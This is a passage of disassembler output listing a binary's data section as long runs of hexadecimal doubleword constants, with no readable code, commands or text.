		dd 8CEDF70h, 32F1AD2Eh,	511D8B6Bh, 3F445A36h, 0E2123D4Bh
		dd 27C9ACEDh, 4D29C92Dh, 773A2D9Bh, 1F59F53Dh, 381DD673h
		dd 0F7F78269h, 47B3EE15h, 456AE8E3h, 9E6FDE7Ch,	3914AF91h
		dd 4BB2EA18h, 0A671629Dh, 3652D8BFh, 0B8EFAF8h,	9DD2FB11h
		dd 3BBAF67Fh, 0A232E441h, 0B4276EC3h, 10A77A1Eh, 85AA1FF0h
		dd 2E35516Ah, 11481497h, 614DB16Ch, 0A8D3F681h,	0E666A992h
		dd 5ADD08A6h, 0ACD30A99h, 0F4CBA153h, 0E4FF5E10h, 0E8FBAE6Eh
		dd 0D2C262BDh, 6215D1Ah, 364A008Ch, 0F7F0F90h, 8C5340A3h
		dd 0E976E490h, 3F7C6FC9h, 1FA167D3h, 2AE4D24Bh,	0C03F8301h
		dd 9155BEC2h, 4A44EE58h, 8A015202h, 1FF8AAAh, 2A09646h
		dd 0C03FD080h, 67219C8h, 0FE8AFA28h, 0CC03B00Fh, 8067019Ch
		dd 0FFE8FFA2h, 0CB43B00h, 0FE8A4150h, 0A601B00Fh, 40320196h
		dd 3FFAFFD1h, 5B18D6C0h, 0A0922806h, 0A1B10554h, 42DAF5C1h
		dd 0C9C108F5h, 1D9F4A67h, 0A493FA76h, 0C0DC713Bh, 8357E95Bh
		dd 0FD7E27Ch, 1E9AFC3Eh, 9CA9FCF1h, 5E26CF2h, 39EB012Ch
		dd 4AF06FB9h, 0A078F67Fh, 632189D4h, 0F04D2D87h, 13CA0CC3h
		dd 7ED397F4h, 31AD73A8h, 0C95D3869h, 0E7C6FC7Ah, 0AE4C2BF3h
		dd 733536B8h, 0EBF76F29h
		dd 80F68DADh, 0A1F5B3C0h, 0CCBF21E1h, 6CE56690h, 90ED16FDh
		dd 0C7E6FD7Eh, 0BF827F6h, 0AA7C85FAh, 0D5FAE879h, 97423311h
		dd 61E7DFAh, 0C375BC7Eh, 0E6F02F09h, 535DF264h,	6D74F8CFh
		dd 8572B1A6h, 55C05A1h,	257BF8DCh, 4CD4CC4Bh, 335EF9E2h
		dd 0D2EF4ED4h, 0ECEF1A4Ch, 0C6C785CEh, 9EDDB788h, 63D84D8Eh
		dd 53362506h, 5716A967h, 3425678h, 2A675428h, 0AE99BDECh
		dd 7711ED66h, 0D9DBEDE7h, 0A4DAE071h, 0B2E9FAC6h, 67CCFF7Dh
		dd 806551B7h, 7E79EA7Ah, 0F3982DC8h, 8852C975h,	0D8CD950h
		dd 0D01CA2F6h, 0DFC57E0Dh, 11C0031h, 67867C62h,	1F86F550h
		dd 2F297AF9h, 2A6CCE1Dh, 62933B2Bh, 536CC2E9h, 2945CF75h
		dd 0E596DD4Eh, 5FEAD1D1h, 69BC3B94h, 0AD1876D5h, 0D2DE6F73h
		dd 111564F1h, 84A8B667h, 1317C300h, 0EE6CCCDEh,	41152D11h
		dd 0F7347A82h, 0C7605070h, 0CDE84143h, 8706E090h, 0BDF64866h
		dd 0C027153h, 0B5803368h, 0D9F488B5h, 0B5CA5DD5h, 5C47B1A1h
		dd 0FFFBFCBEh, 0A21103C4h, 0C504C992h, 0D83DCA2Eh, 4158A9D4h
		dd 0B0040EA6h, 10D98121h, 5C821E30h, 92F01D60h,	47314200h
		dd 9584684h, 20200501h,	11A38CBh, 0C4AD413Ch, 12BC6255h
		dd 4B10095Ch, 2CE2257Ch, 0B6099651h, 0DC255A84h, 80976D12h
		dd 625DBC4Bh, 8979112Eh, 25FC44BBh, 4212F8h, 6129486Fh
		dd 84A62094h, 12A00252h, 4AA0094Eh, 2B022548h, 0AE899561h
		dd 0C22556C4h, 28965F12h, 225A8C4Bh, 96D712Dh, 25CCC4B6h
		dd 978112E0h, 5F444BB0h, 11812F62h, 4A28BF09h, 2922A10Ch
		dd 0A6899471h, 0A02552C4h, 90954F12h, 8255444Ah, 958312Ah
		dd 257044ABh, 960112B4h, 58C44AF0h, 66122C42h, 0A84BB209h
		dd 0D12DD025h, 4B95896h, 12ECC25Ch, 4BC80974h, 2FA225DCh
		dd 8D2997B1h, 4644A3Eh,	12981548h, 4A78094Ah, 2A422538h
		dd 0AB099501h, 0BA255504h, 10965912h, 0E25A804Bh, 8972412Ch
		dd 25D0C4B6h, 977112E6h, 5F444BB0h, 50842F02h, 4A2888C1h
		dd 2922250Ch, 0A6099471h, 9E2552C4h, 98954E12h,	0E256444Ah
		dd 95D512Ah, 258844ADh,	900312C0h, 0C3824B20h, 483A4720h
		dd 484C0233h, 42501082h, 0C84A12B6h, 0D8C8BE25h, 0F30167C9h
		dd 7E19D0Bh, 1C1F6B8Ah,	0E2F958A9h, 0E29AFFDh, 0AA3C8793h
		dd 8BBA7348h, 5D2666A9h, 1F5ACF0Ah, 0B480AA36h,	0D293B18Bh
		dd 96ED0602h, 0FBE841D6h, 71F2CDA1h, 383CA4A2h,	0FB5BA42h
		dd 0FBE7B86Ch, 0AF9E40F5h, 26A67DFBh, 0B317BD8Bh, 0C09261DDh
		dd 68218652h, 5E1D3881h, 6CB632DCh, 0D2EBD6E5h,	4468DBEDh
		dd 0E5542172h, 0F04C73AAh, 1648D596h, 606A7238h, 2C011D02h
		dd 0E6B4198Bh, 1EB89708h, 4D310721h, 8031480Ah,	0EFF1A52Fh
		dd 77B33CCAh, 77B9D4E8h, 8821D184h, 92788C19h, 95A84964h
		dd 0D1A967A1h, 0D16F6FE6h, 5D527DC3h, 0C6D4055Ch, 85449FCh
		dd 0F59CB74Dh, 95DDC917h, 0FD8A2A0Eh, 0DB1FE63h, 90DF877Ah
		dd 0DE0B8B58h, 8009FBF9h, 343307A2h, 169EB520h,	3961D77Dh
		dd 0C07C0290h, 12A12300h, 3AA3B281h, 93892AE7h,	0E1503C4h
		dd 0A2613EC5h, 0F0436080h, 7D9434E7h, 485A4607h, 19C9D422h
		dd 0F8FE2268h, 200AE0B9h, 9160893Ch, 0FB2614CAh, 654E1FF7h
		dd 0B658FB5Eh, 6A1DE74Fh, 55ABAB55h, 746BBECDh,	7AA7DCA9h
		dd 47134344h, 93010896h, 157FD225h, 0CCCBC528h,	984CA5DCh
		dd 263B1CEBh, 0C068A28Ah, 3E8F2788h, 8C397ABDh,	73303F25h
		dd 0B8038AC2h, 470F7932h, 0BD920770h, 0B9E63202h, 0DBE7CBE0h
		dd 9B4D3324h, 5DB3DF34h, 18E18EA7h, 0ECB0D468h,	0BE23FEE0h
		dd 634F993Ch, 230459h, 0C054F521h, 380E8B86h, 45D80B17h
		dd 0FAA58697h, 0BA45D3E8h, 2867CB75h, 4054CE96h, 0A689A657h
		dd 743B0D3Ah, 3F507489h, 66563D7Dh, 7589093Ah, 83A5220Bh
		dd 833AF441h, 5214A200h, 614E7EB8h, 9A00D204h, 9F28B123h
		dd 1B0C8EAh, 744A0885h,	5B492B0Ah, 9A148327h, 2454A0E9h
		dd 9CECC038h, 5B1C920h,	5C74750Bh, 6046DEA8h, 3C48D80h
		dd 0F4041904h, 42B1BA06h, 0A761CD80h, 9E9107ABh, 625B61E0h
		dd 63C96021h, 9744A861h, 764D6210h, 226C01Ch, 1862C78h
		dd 0A460974Eh, 83C100B3h, 426B150Bh, 605C3599h,	8A4E0A9Dh
		dd 27490105h, 0B2C8CAC9h, 414065C0h, 563F42C6h,	5CE81458h
		dd 1C0CD959h, 2E69F40Dh, 0A69C112Dh, 2C886350h,	1B10D0A0h
		dd 9EA916D1h, 3215425Dh, 2B2B304Ch, 0D8228160h,	0A0901F00h
		dd 155B857Ah, 0D16A59B0h, 63A05FA8h, 46DA809Fh,	6CD1D912h
		dd 8D7E18D2h, 5C9DB63Ah, 0D4D59933h, 0C009AA62h, 0B4BAEB81h
		dd 8ECFF586h, 3DB2446Dh, 0C36251B7h, 0B23DD332h, 2CB072A4h
		dd 0F278BE71h, 0D5450273h, 0C0748C71h, 5B32B539h, 0A8785B1Ah
		dd 2D866F08h, 0A9DE944Bh, 0EDD7E520h, 39D16DA5h, 0BC0E4376h
		dd 6DCCBA35h, 9DA00F02h, 0D96BBD24h, 0F725C5D8h, 8B3065BDh
		dd 0AEB74B21h, 603C30DAh, 0F68B3BA1h, 4B000502h, 40DC482Ah
		dd 405670E9h, 0C80B5D9h, 6906D977h, 80202Dh, 47EC4625h
		dd 0A00D0E2Eh, 0F36FE5C0h, 0B25902BEh, 0A098BA95h, 94324624h
		dd 15F4DB4Fh, 0EE01796h, 0CC9CA58Dh, 46042059h,	7920523h
		dd 0D848902Dh, 42C5D65Ah, 0CA482603h, 0C16B7505h, 4A8BAA81h
		dd 808B75BCh, 0C1705C25h, 0A030630Ch, 0C6AAB283h, 60295925h
		dd 63B5052Ah, 86E6463Bh, 603C8C5Dh, 0F7A54AD0h,	2AD50B2Eh
		dd 82DFC8Ah, 3080054Ch,	8C211164h, 6097236Ch, 0C24A7C4Bh
		dd 8080012Eh, 0C236F379h, 6A59808Fh, 67A10606h,	75567E55h
		dd 0C84811D4h, 66FCC8F7h, 1B5708C7h, 0E3DA1E2Dh, 965879B1h
		dd 0DE4C13F7h, 0F4843157h, 0EF50477Dh, 9CFD3427h, 37FAB2D4h
		dd 0F7BD2BFBh, 0A44BF593h, 29413859h, 0BDEBB391h, 82FA269Fh
		dd 0E59B8113h, 0BB8D3F2Ah, 0A8C0CC03h, 0D973088Eh, 0EC97F58Eh
		dd 5A03A6DBh, 6C0852F6h, 3DD2AA3Ch, 2F7296EBh, 26FFD15Fh
		dd 0C40B256Fh, 0F69B9818h, 0B8C45BECh, 0A5A71B0Fh, 0A9F10B3Ah
		dd 8458CEA9h, 0EB6D4B60h, 55A8D873h, 0FD8692D9h, 53185104h
		dd 4D4234A2h, 0D49AB3CAh, 8617A88Eh, 52955539h,	54062A35h
		dd 129746CCh, 0A2F51A1Dh, 4AA165BCh, 0E9E422A8h, 0AAAD497Fh
		dd 0B2B461CDh, 4E68C118h, 8186A2E5h, 53CA4DEDh,	0E8CB1518h
		dd 1B5E7596h, 38EDECC6h, 54186E6Ch, 512C55A2h, 0A4EED171h
		dd 0BCC31F82h, 330E6D98h, 5338834Dh, 22C02B12h,	0E110A012h
		dd 2AEFh, 0
		dd 0A0000000h, 434A0043h, 1000h, 0
		dd 20F33410h, 32289FF4h, 0A78063B4h, 1184685h, 8533D094h
		dd 11842601h, 0D2D765B9h, 5B8A5B26h, 73297590h,	0B1261228h
		dd 0F65BA536h, 0DE7EEA7Ch, 0C522C36Eh, 542F414h, 4A65BCE9h
		dd 0C2B69B15h, 0C8B93BCDh, 5892A81h, 0CB7D8CEDh, 90917377h
		dd 324C7051h, 6F169057h, 6114AB5Ah, 4F5D2EB6h, 1B650458h
		dd 141843Ah, 8C190485h,	29A52B00h, 8DC12C2h, 25944B48h
		dd 930C3A00h, 35D6E6D5h, 0A355394Dh, 1A5B0D9Ch,	0B50ADF78h
		dd 6934FA04h, 8952ADC8h, 0F8C03EFBh, 0EE112200h, 2 dup(0)
		dd offset loc_43B000
		dd 1745434Ah, 2, 20380000h, 931720ECh, 7A7F79A4h, 94FED6AFh
		dd 7FA7E4ABh, 0F84C180Ch, 89106621h, 0C2C19F88h, 80A4580h
		dd 887E04ECh, 18057A57h, 83A13651h, 73FE4C0Fh, 61E57DC8h
		dd 0EBF3FD20h, 0D321D982h, 4F24F5C5h, 9AE87788h, 31863433h
		dd 0F7EF0910h, 0F0A002A7h, 375F90C0h, 0AD63BD9Ch, 69141302h
		dd 0A1C74CE6h, 49204132h, 0BAC870F1h, 87691EDDh, 0C3177188h
		dd 54BD287Ch, 9DB60492h, 0BDCC0221h, 4E73DA32h,	0FCA172Ch
		dd 2BDB1A4Ch, 3DE157F4h, 0B61BB453h, 0D9C1AF2Dh, 794727C9h
		dd 72FCEB42h, 6024817Ch, 665112F0h, 0D8C1BD7Eh,	6D1520A9h
		dd 30E221F8h, 16504C72h, 7E001958h, 325E49B2h, 3D4CC861h
		dd 0EFFB5452h, 347A174Fh, 0A18B200Eh, 0CC91E54Ah, 0C130A29Fh
		dd 0CAD1E55Ah, 0E062941Eh, 887E6933h, 51AD68BFh, 409523EEh
		dd 9A41E35Fh, 2D7E9871h, 0FD7F095Ah, 0B896E9A9h, 0F7E1C0BCh
		dd 20229293h, 7BDD3799h, 0BD860E31h, 958C76D1h,	0D9E07C65h
		dd 5B920F02h, 0B45DEB6Ah, 24082729h, 6E778143h,	2E5F1DA8h
		dd 826F0081h, 8427C0F7h, 7FF7499Eh, 7255A2B9h, 0E2507641h
		dd 3CB835F8h, 8C35FF50h, 0B37DBEBAh, 0D05979A4h, 8AC90918h
		dd 1A08B2EDh, 0E8A1641Eh, 0C0B6B537h, 925AD9B8h, 6A204D2Ch
		dd 791B3F1Fh, 2211277Ch, 0F9CD8A80h, 6E2A6AAAh,	82910D5Bh
		dd 1F12C98Fh, 0BAED005Ch, 0A7810807h, 0FA92942Fh, 17F6E3CFh
		dd 0BFBAFC3Eh, 0FA6087FAh, 0C2226C94h, 0F720EFBFh, 0D9EE4923h
		dd 0A2C511B9h, 8DCD27A0h, 7FB7A0E9h, 0F0D55410h, 707BDC3Ch
		dd 28E17CACh, 0C7114948h, 733739FDh, 17C44BFCh,	0F5BC53B4h
		dd 0EF78DFBAh, 41270F2Fh, 0B868C87Dh, 7C53871h,	0B7D4BD57h
		dd 0E0BD2FF8h, 61F82416h, 7D1BFA4Ch, 0A834CB67h, 88E03712h
		dd 0EF8C9D32h, 0F7E37DF4h, 2993ABABh, 7E72A4DFh, 0A98FC6E0h
		dd 2FDA6919h, 477886D9h, 3C5FCB26h, 66CB75DCh, 0C0969CCDh
		dd 0BA38819Ch, 0A172B551h, 0F111F031h, 9493A07Ch, 0E1DB87Ah
		dd 5B6ABD73h, 0AC0A4EABh, 0E3D91A6Dh, 42CD51F8h, 0EC52A8BEh
		dd 41DA4504h, 46FA54B3h, 159A0C0h, 2CF69BB3h, 0EF8B9E51h
		dd 0F1ADEB83h, 6D85607Bh, 0CB34F9Ah, 0C594F982h, 0A1EE950Fh
		dd 0DCE59B84h, 0D3C8A864h, 0C22201h, 0C3E071B0h, 81E653D5h
		dd 14AF9D86h, 0F5F54A81h, 0C6EE6260h, 5BCE82CFh, 29688A25h
		dd 3C32F674h, 54BD03Ch,	86B14959h, 0F14D079Eh, 0E7010752h
		dd 83AD0967h, 0F94B136Eh, 84D9950h, 3EA3F1Eh, 73A85B9Fh
		dd 0F895ACCEh, 45A2671h, 0A55FBEADh, 0B1FE1F85h, 0D6ECDA49h
		dd 58E04B47h, 0AA135633h, 0E766F022h, 0E2821A5Dh, 5D0BEF03h
		dd 0FA00CEA6h, 9DC3E6C8h, 0FE004B47h, 3461F158h, 5FB25428h
		dd 0FE07351Ah, 0B66C596Dh, 0E30BB5D5h, 37CEE1E0h, 0BD4CE80Eh
		dd 6E0B7402h, 1E8B1254h, 0D42949A5h, 80210FC0h,	7C28456h
		dd 97221F6Ah, 18BB7034h, 45F7E06Eh, 0B15D7B6Ah,	37DC53E4h
		dd 303C485Ch, 6F31441Ah, 0C0561907h, 7C8A21C4h,	4F27E731h
		dd 0E0A3C0A1h, 0EB62123h, 701280ACh, 0DF6D2A4h,	8E704971h
		dd 197EA16Dh, 59ACE972h, 89CFF6B5h, 0CF5B56D4h,	8AE137B8h
		dd 0F82403F1h, 0E95DB7C6h, 0AB89A24Dh, 7CF2BA00h, 0C883B960h
		dd 0C0972A9Fh, 9FD08E50h, 4D9253EAh, 5C295999h,	5162F55Fh
		dd 95426E6Eh, 827E73A1h, 8BDF06B5h, 0C9ADF996h,	559C6A7Bh
		dd 0ADC1607Dh, 0CD785F02h, 3899E147h, 86038B52h, 0FD8B2024h
		dd 59F4AC96h, 29C1238Ah, 0CC9DC465h, 147792Ch, 1A91AAFFh
		dd 0EFC43956h, 8B743D29h, 939BC17Dh, 3B418A3Bh,	24E84515h
		dd 0B42F36Ch, 0B286561Ch, 6682564Dh, 8AC6C5ABh,	0E32ED452h
		dd 0FE077ADBh, 5FD2D629h, 22A05AB9h, 981EC2B9h,	574C2974h
		dd 980234C6h, 30DBA838h, 0D9834DE6h, 64F6362Fh,	0A22DE200h
		dd 18D35166h, 0EA1F3E96h, 0C82A8D16h, 0F8403BA0h, 854178BEh
		dd 6DDAFA04h, 0C539C4E0h, 5802503Bh, 6A54F097h,	15680D0h
		dd 71C47125h, 0AEE053D9h, 0C9173DC5h, 0D7A57E18h, 49C3D236h
		dd 0F6DFCE04h, 0DB5EAB21h, 0FC1669F6h, 203B0814h, 9E596C3Bh
		dd 0F43078F7h, 796B8FBh, 41F3F89h, 345355Ch, 0DFAE52h
		dd 0EFF83B8Bh, 1F862D75h, 8583D50Eh, 0E8E3AE43h, 0F4B403FBh
		dd 9F2BE119h, 8E485209h, 669F83E0h, 30F4F86Ah, 8E17CBB0h
		dd 0EDF9B81Eh, 89AA9FAFh, 517F3709h, 0A968FE0Ah, 4D0E8E56h
		dd 5955DA61h, 3444547Eh, 7CE01F8Ch, 0E3382020h,	0A607FDA9h
		dd 2F973C88h, 524ED16Dh, 147D51Ch, 5481E1D9h, 4B25719h
		dd 81556C25h, 0B3784F2h, 0C66346AAh, 5BEDEFA8h,	90890A4Ch
		dd 0A6A538h, 15981CBh, 171FF76Eh, 3F35FE9Bh, 12A901DBh
		dd 5E8045A2h, 0BB8E6867h, 5A05AD1Bh, 0F9463359h, 84CF9B9Eh
		dd 2FB630Bh, 54AD416Ah,	0BD80AFD4h, 0F6A51768h,	0CD7265A9h
		dd 0B552758h, 0D99E14A8h, 5E91AD1Ch, 0EB3C4B01h, 3410CD7Dh
		dd 0ECC15C1Eh, 77011948h, 14FFBD1h, 2E8F5E26h, 0B777F333h
		dd 9C044580h, 8990B21Eh, 0BABF261Fh, 86D7CB16h,	0DFA82ABh
		dd 0CF456138h, 98B37BB6h, 0E7F224A3h, 0F973C14Ch, 1FBCB565h
		dd 0BE98DF7h, 0B33E5FE7h, 3A4970B3h, 12691D6Ch,	0C2FBE58Ch
		dd 76E19458h, 2ABC4A83h, 9798EB18h, 0BECEF52Ch,	89FB053Fh
		dd 0E18D5F1Ch, 9A4DCEh,	43D0A2F9h, 76A6DD64h, 0C75247CEh
		dd 7D3BA141h, 4281D0E2h, 224FD18Bh, 71A782B1h, 449DA583h
		dd 93F39691h, 0C6BF916Bh, 399BCB35h, 5E07D3ADh,	0DC70A1E9h
		dd 0C3309DB7h, 0A691BB40h, 0EF0F8CEEh, 1F9C6F3Ch, 30731016h
		dd 0F452F02Fh, 85C5344Fh, 332B15Fh, 0C8C57D18h,	22C0FDFFh
		dd 0B0DAAB2Fh, 0E762FAA8h, 65C951C2h, 95C978A9h, 11B6E03Bh
		dd 5FE59CD1h, 0D13DD2BCh, 743568A2h, 0D6C09C5Dh, 2A9690E1h
		dd 0CE061F8h, 60A041B8h, 986338DFh, 703533FEh, 0ED18E27Ch
		dd 0DFDF8F51h, 0C17DAE7Ch, 5F7E5899h, 2CAA4A1Ch, 72CE00CCh
		dd 0A322D59Ah, 6B10E7A2h, 1ED18E6Bh, 0D593BE40h, 0A72A6A79h
		dd 4B62C80Eh, 376BA202h, 5A352E0Ah, 186D448Bh, 0AA0CFBBAh
		dd 229E783Ah, 4CA213CDh, 0F167C63Eh, 8A60537Ah,	10DA3078h
		dd 1CB51637h, 0FA82C593h, 981E933h, 729FCC4Eh, 7F3FE7DAh
		dd 0C1F41EE9h, 0DB887301h, 2CE1D176h, 7955E0Ah,	8B74AA2Eh
		dd 7BAC1256h, 0D6E716AFh, 0CFDFE04Fh, 22A1F70Eh, 0ED238304h
		dd 70762B62h, 38935B58h, 9147D36Eh, 0F1063CF5h,	1145CA77h
		dd 13CC181Dh, 0F3418361h, 0C581D982h, 4469BAD7h, 465C160Dh
		dd 75B5CCB3h, 25856DBAh, 2833CAE6h, 0FD2FE4EEh,	83E80FE4h
		dd 0BC4315EFh, 0FC09272Fh, 0A24D3950h, 0DA44DE85h, 1541C04h
		dd 9BCAC713h, 0B2286438h, 30052277h, 0E2A59467h, 0EEBB307Eh
		dd 44CDEA5Bh, 3B6A8D8Bh, 0C8F23850h, 4C78DDA9h,	5C6AB9F5h
		dd 0F2EE0E27h, 0A8CCD8C0h, 57114053h, 6AA40215h, 167781E0h
		dd 0EC2CDF4Bh, 11381345h, 0E1F6BA37h, 72F422A5h, 1493B8A3h
		dd 5038BB8Ch, 22B299C7h, 9D44AD5Ch, 3F3BAF2h, 0D4A79781h
		dd 0A951B431h, 9C31D861h, 0ED4637CBh, 75F226B1h, 0BA1D413h
		dd 14C2B47h, 2DC44DECh,	7E146288h, 3769F918h, 786A8CCCh
		dd 0CE3D39Eh, 0FF38F81Eh, 0A3624583h, 0AFEDB439h, 0FBA1C630h
		dd 0BC150549h, 75B337C3h, 16076374h, 59981C38h,	0FB26E7DBh
		dd 0F3B5D2C0h, 24D04E44h, 246D6916h, 0A8D458EFh, 8E8CC494h
		dd 0D9B03F15h
		dd 0AEB68642h, 59B6DCEEh, 4912893Fh, 25609AA5h,	4F14C8ACh
		dd 0C48826D7h, 0DCDFF224h, 0D5CBF8D2h, 0C4F0C35Bh, 89DD5216h
		dd 3CAFAAF6h, 0F110CEE5h, 522DF078h, 0C40451BFh, 0E6034449h
		dd 0DC053795h, 0F8789FC6h, 4734DF2h, 380B868Eh,	0FF8B0430h
		dd 0B41EE9A6h, 0F556F451h, 99EB002Ch, 813C2028h, 0CCB18AC4h
		dd 0FDFBE02Dh, 9C17A2E3h, 16912C32h, 641584EEh,	8325C49Ah
		dd 0AC889CD0h, 2860B790h, 0AE6669F1h, 0B03A7ED7h, 22FCA2AAh
		dd 81E906AEh, 0B15D6A75h, 4ABBC5A0h, 48A62E71h,	0EC508151h
		dd 67F12F13h, 0CD3A3E2Eh, 49A717ADh, 33133E20h,	5361E99Dh
		dd 0AC610F57h, 46C4AA8h, 612B255Ch, 0A5FD67Ch, 294875D8h
		dd 2AF2DFE6h, 0FC68A207h, 0ADFE7ABEh, 82DB12CDh, 87E0D8DEh
		dd 780AD1F8h, 60E7B5FDh, 808AA3F2h, 6E3BB8Bh, 7E8B2F56h
		dd 1330A117h, 4A6A0ECCh, 0C0CC0814h, 0BC0C3492h, 9D7C2773h
		dd 70AC1FDFh, 0F01BAC97h, 7E297E43h, 0DB499B30h, 7B04A2C0h
		dd 0CFBEE3E0h, 6B16D90h, 0EF8F2E26h, 0DB921AA9h, 2C403AAFh
		dd 3A5ABCFAh, 0AC9F1B42h, 7C690289h, 0DCC83C9Fh, 884EED6Eh
		dd 7451F216h, 74B7D9C5h, 9D705Eh, 0CD140128h, 688E3F03h
		dd 931AB6A5h, 95197530h, 3125D607h, 3ABFD16Ch, 0C1E1FC52h
		dd 287A6373h, 0FDFF424Dh, 0C81B6F32h, 0C0E42C0h, 73503C99h
		dd 74053BF2h, 0F3AC180Bh, 0DF564D26h, 0CBE60291h, 0C5FF07ADh
		dd 5CC1FB29h, 0A7CB35CCh, 9BEBD272h, 40B5EB62h,	0F5D69C2Bh
		dd 0DDA3A3D5h, 0FC6F5CD4h, 8C04F81Fh, 8E3C9F3h,	8BFD0D96h
		dd 0BAFEE568h, 26846E51h, 0E5FD07EFh, 17CE45AFh, 9F33FD2Dh
		dd 4D39845Fh, 0AD07AD48h, 0B885EB7Fh, 0AE2473DCh, 512F60B1h
		dd 9A81521Dh, 0F88FE835h, 0ABC8FB61h, 749EACC9h, 0C5F49BC7h
		dd 0BD68952h, 0A72816DCh, 2EA40485h, 0D3177509h, 9532A543h
		dd 0F24A078h, 697099ECh, 494F9EF6h, 41912A77h, 0AFCF02Eh
		dd 0B42E0507h, 60328215h, 3CF56BB9h, 0C6EDE425h, 0C709284Eh
		dd 8011559Bh, 94A618C7h, 0E1C34194h, 0BDCEBBC1h, 0EC2EF03Ch
		dd 0A9CD2FCFh, 96AC6B61h, 9F7BF294h, 92D29C48h,	12873368h
		dd 0E36555AAh, 6D23AB87h, 0C3607235h, 0D90A8B31h, 8626F102h
		dd 184A190Ch, 0D8A114Bh, 54E614A3h, 0D20568BBh,	970FEDE7h
		dd 95074D3Fh, 0A812C77Ch, 1C6CC5Ch, 3B5554DAh, 0F201BD9h
		dd 0EB24FC2Bh, 45D01674h, 9AA4ABABh, 0A0405CE2h, 3B468098h
		dd 31F2F8B5h, 1EFA6348h, 1A741CBEh, 0E1AC301Eh,	8289914Eh
		dd 30358BD4h, 0CEADE779h, 0FC88C09Eh, 572BB333h, 0A8A43812h
		dd 568F1A7Eh, 53E9DEF1h, 852DDD1Dh, 8C2739B5h, 0F94F4F12h
		dd 942C1FB2h, 0F0174211h, 2FD728A5h, 411CD28Bh,	853ACB8Bh
		dd 0C3373DFh, 0CEBC107Ah, 53BA9DAh, 0BCAE270Eh,	0D7CCA767h
		dd 0B3197FDDh, 8B698AC6h, 0B420B07Ch, 435D55AEh, 0B4B3162Dh
		dd 305A4F1Ch, 6E615E1Ah, 311CF898h, 0CEE9CA2Fh,	0EB6B0707h
		dd 3E599B5Ch, 65B551B6h, 3D7856B4h, 35C59DDBh, 435A147Ch
		dd 56FF95D1h, 0A34BDFA1h, 0A2280A6Ah, 153166A7h, 48E3A299h
		dd 4C1B788Eh, 0B45DBF07h, 0C764879Fh, 8D090EC0h, 2F6F97BEh
		dd 0A609098Ch, 86442088h, 144D9E1h, 873FB75h, 2E49F228h
		dd 0D73AB03Fh, 70F45A96h, 1032DAC4h, 3F166ED2h,	0C05B6E84h
		dd 0E07EAA3Eh, 0F4E04F5h, 811818D5h, 6DBEB707h,	0EB626C72h
		dd 0E34CDDE1h, 0FD7FA9B5h, 0F634E265h, 0E0950A07h, 9FE7A618h
		dd 4CA3BBB5h, 93CD16D6h, 452BCA4Dh, 0C7BB4DD3h,	8FB786FBh
		dd 1A7F83A0h, 0C54128F7h, 0ECA97D53h, 0BB0FEB17h, 621394ECh
		dd 8746B525h, 3EF6B5EDh, 4FDEE6B3h, 652B2E3Ch, 2EF77C7h
		dd 0FC5E5D6h, 7F7F2E05h, 0EDD318C0h, 0F3E015FEh, 2E7B135Ch
		dd 0C7CC7EF2h, 3DE8B689h, 0AAAE54F4h, 0B4661FF5h, 7CA9E76Eh
		dd 0C1852A2Eh, 52408EB3h, 0A1AD030Fh, 6CBFC3F0h, 879EC890h
		dd 0F31A96E6h, 86D5D977h, 73B055Ah, 91204AA2h, 6A0B9AFCh
		dd 57D48891h, 737F4E4h,	78DA43Ch, 0CD7E2D47h, 6ACD0C85h
		dd 62332274h, 9FE4EA4h,	0ED10AE9Dh, 0CB1AB869h,	68B372B9h
		dd 0B97FA8AAh, 3A52548Ch, 48D307B2h, 0BA0E24B0h, 0DE2747D7h
		dd 0C5B8B768h, 0FB8FA190h, 0CE2D1095h, 0BA160C8Bh, 15A99A9Eh
		dd 9781DE50h, 78AAFBC1h, 9706453h, 0FBED7811h, 0F9B8A260h
		dd 0C1B6D96Fh, 0C353DD8Ch, 0AB354AAAh, 0A2596690h, 0CFDE0F22h
		dd 93091014h, 0D1734AEDh, 5A431FD5h, 0F3B55290h, 0C58852F8h
		dd 994084ABh, 6C21915Ch, 0D4C4EDC8h, 63CCF898h,	0F03B1055h
		dd 32BFE43h, 86ADEBE2h,	2B796E2h, 56754696h, 0B7580C2Ah
		dd 0B51B5348h, 6B11DA39h, 0AD81C561h, 3A100236h, 2CF192E4h
		dd 3E6C46Bh, 792AF0ADh,	0F5A11F79h, 896CC08Ah, 3D7D41C8h
		dd 0E16705BBh, 0B6086F23h, 0F9A5A1C5h, 0C31F673Eh, 0BAF7C6BBh
		dd 0F6C0580Ch, 0B69E956Eh, 0ED93F0B5h, 886FFE19h, 492B3BB8h
		dd 4B53DC09h, 59DDB464h, 5FA3801h, 6165B717h, 54205281h
		dd 1FB8F49Fh, 0A50289Bh, 8E1FF87Bh, 90F2C16h, 223B6950h
		dd 55544C84h, 722FA5E4h, 0C36B828h, 2C9C9D24h, 4DF8F48Bh
		dd 1089BFABh, 2B3E885Bh, 834516FAh, 57E7DD1Ch, 8DEF8761h
		dd 0D9FA17CBh, 6BE794A5h, 0CBD9815Ah, 7999DA1Ah, 22758472h
		dd 0B07C7E13h, 25E34285h, 0ADF74846h, 1548C6E4h, 0A35A54ADh
		dd 8F19468Ah, 0A6E2041Ch, 6E2EB312h, 7769F27Bh,	1E760996h
		dd 63B45AE7h, 9FDFBB81h, 0D1F7F934h, 0A14ADF82h, 9E7E9A73h
		dd 0E75DD034h, 2912DDA4h, 9292D79Ch, 0F22F4480h, 0DB8F4EC9h
		dd 0A765C89Eh, 0AA63D284h, 0F43F0DE1h, 0CC2F5BCAh, 0BFAA07BFh
		dd 7B057D98h, 0BD5EBD59h, 2AC9372Dh, 7B7C3697h,	80145200h
		dd 0DB92FD37h, 0A168B23Dh, 0DE51F5F7h, 1F3BB953h, 0D1BF4D2Eh
		dd 383881FCh, 0D8B9DD5Bh, 8F1AC22Eh, 9E6BD707h,	381F53D0h
		dd 9EA9AEFFh, 0F88CF55Bh, 0ED335FA1h, 0E4650DF1h, 8C1481FDh
		dd 0D6B0F536h, 3C682944h, 0A6376938h, 8DC38E04h, 0BBDBC741h
		dd 0B0DCF05Dh, 5D768EE9h, 70639C9h, 33C88E99h, 60BA4526h
		dd 5DC581E2h, 61E8B58h,	0D0666DEFh, 1CE58435h, 6D6D87BEh
		dd 0E99269FBh, 1E02A8E2h, 4634887h, 2BF3D640h, 7B4460BFh
		dd 0C4BB4615h, 8D35D781h, 0D33557DAh, 31196DA6h, 36584CEAh
		dd 0D7460D1Bh, 0F5770A67h, 0B0A8A28h, 7BC2CDE6h, 7DFA747Eh
		dd 0B678AFE0h, 72078E36h, 44CD5E4h, 68CAB5BDh, 2BFDCF17h
